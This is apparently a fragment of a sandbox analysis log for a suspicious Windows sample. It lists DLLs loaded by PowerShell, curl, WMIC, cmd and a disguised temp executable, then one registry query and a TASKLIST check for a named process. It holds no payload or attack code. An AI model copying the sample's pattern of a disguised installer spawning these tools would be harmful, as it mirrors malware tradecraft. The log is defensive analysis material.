Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\reg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH

